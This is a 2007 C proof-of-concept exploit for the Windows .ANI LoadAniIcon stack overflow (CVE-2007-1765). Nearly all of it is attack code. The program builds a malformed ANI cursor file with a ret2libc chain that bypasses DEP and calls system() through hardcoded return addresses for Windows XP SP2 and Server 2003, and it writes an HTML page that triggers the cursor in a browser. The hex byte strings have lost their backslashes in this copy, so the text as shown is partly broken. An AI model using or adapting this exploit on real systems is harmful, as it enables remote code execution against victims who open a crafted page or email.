devcode2.txt
Posted on 05 April 2007
/* * version 0.5 * Copyright (c) 2007 devcode * * * ^^ D E V C O D E ^^ * * Windows .ANI LoadAniIcon Stack Overflow For Hardware DEP XP SP2 * [CVE-2007-1765] * * * Description: * A vulnerability has been identified in Microsoft Windows, * which could be exploited by remote attackers to take complete * control of an affected system. This issue is due to a stack overflow * error within the "LoadAniIcon()" [user32.dll] function when rendering * cursors, animated cursors or icons with a malformed header, which could * be exploited by remote attackers to execute arbitrary commands by * tricking a user into visiting a malicious web page or viewing an email * message containing a specially crafted ANI file. * * Hotfix/Patch: * None as of this time. * * Vulnerable systems: * Microsoft Windows 2000 Service Pack 4 * Microsoft Windows XP Service Pack 2 * Microsoft Windows XP 64-Bit Edition version 2003 (Itanium) * Microsoft Windows XP Professional x64 Edition * Microsoft Windows Server 2003 * Microsoft Windows Server 2003 (Itanium) * Microsoft Windows Server 2003 Service Pack 1 * Microsoft Windows Server 2003 Service Pack 1 (Itanium) * Microsoft Windows Server 2003 x64 Edition * Microsoft Windows Vista * * Microsoft Internet Explorer 6 * Microsoft Internet Explorer 7 * * Tested on: * Microsoft XP SP2 + DEP + Internet Explorer 6 * * This is a PoC and was created for educational purposes only. The * author is not held responsible if this PoC does not work or is * used for any other purposes than the one stated above. * * Credit goes to HOD (if he/they exist :P) for the html. Works on * XP SP2 with Hardware DEP enabled, go figure. * * ^^ shoutz to Wonk(if he exists r0fl), InTeL, thrasher :) * * */ #include <iostream> #include <windows.h> /* ANI Header */ unsigned char uszAniHeader[] = "x52x49x46x46x00x04x00x00x41x43x4Fx4Ex61x6Ex69x68" "x24x00x00x00x24x00x00x00xFFxFFx00x00x0Ax00x00x00" "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" "x10x00x00x00x01x00x00x00x54x53x49x4Cx03x00x00x00" "x10x00x00x00x54x53x49x4Cx03x00x00x00x02x02x02x02" "x61x6Ex69x68xA8x03x00x00"; /* system("calc.exe"); */ char szExecute[] = "logoff.exex00"; unsigned char uszHtml[] = "<html>" "Microsoft Windows .ANI LoadAniIcon Exploit" "<br>Copyright (c) 2007 devcode<br>" "<style>" \n"* {CURSOR: url("poc.ani")}</style></head>" "</html>"; /* Usage: ani.exe 1*/ char szIntro[] = " Windows .ANI LoadAniIcon Stack Overflow " " devcode (c) 2007 " "[+] Targets: " " (0) Kernel32.dll (ExitProcess) " " (1) Windows XP SP2 + DEP " " (2) Windows 2003 Server " "Usage: ani.exe <target>"; /* RET2LIBC attack */ typedef struct { const char *szTarget; /* kernel32.dll - set the proper stack frame LEA EBP, DWORD PTR SS:[ESP+10] SUB ESP, EAX PUSH EBX PUSH ESI PUSH EDI .... .... RETN */ unsigned char uszRet[5]; /* msvcrt.dll - system() */ unsigned char uszMsvcrtCall[5]; } TARGET; TARGET targets[] = { { "Kernel32.dll (ExitProcess)", "x90x90x90x90", "x90x90x90x90" }, { "Windows XP SP2", "xD6x24x80x7C", "xC7x93xC2x77" }, { "Windows 2003 Server", "x0Ax17xE4x77", "x10x8CxBBx77" } }; int main( int argc, char **argv ) { char szBuffer[1024]; FILE *f; void *pExitProcess[4]; if ( argc < 2 ) { printf("%s ", szIntro ); return 0; } if ( atoi( argv[1] ) == 0 ) { printf("[+] Getting ExitProcess address... "); *pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ), "ExitProcess" ); if ( pExitProcess == NULL ) { printf("[-] Cannot get ExitProcess address "); return 0; } memcpy( targets[1].uszRet, pExitProcess, 4 ); } printf("[+] Creating ANI header... "); memset( szBuffer, 0x90, sizeof( szBuffer ) ); memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 ); printf("[+] Copying execution code... "); memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 ); memset( szBuffer + 136, 0, 4 ); memset( szBuffer + 204, 0, 4 ); szBuffer[136] = 0x6C; szBuffer[204] = 0x6C; memcpy( szBuffer + 196, targets[atoi(argv[1])].uszMsvcrtCall, 4 ); memcpy( szBuffer + 200, targets[atoi(argv[1])].uszMsvcrtCall, 4 ); memcpy( szBuffer + 240, szExecute, sizeof( szExecute ) - 1 ); f = fopen( "poc.ani", "wb" ); if ( f == NULL ) { printf("[-] Cannot create ani file "); return 0; } fwrite( szBuffer, 1, 1024, f ); fclose( f ); printf("[+] .ANI file succesfully created! "); f = fopen( "poc.html", "wb" ); if ( f == NULL ) { printf("[-] Cannot create html file "); return 0; } fwrite( uszHtml, 1, sizeof( uszHtml ), f ); fclose( f ); printf("[+] HTML file succesfully created! "); return 0; }
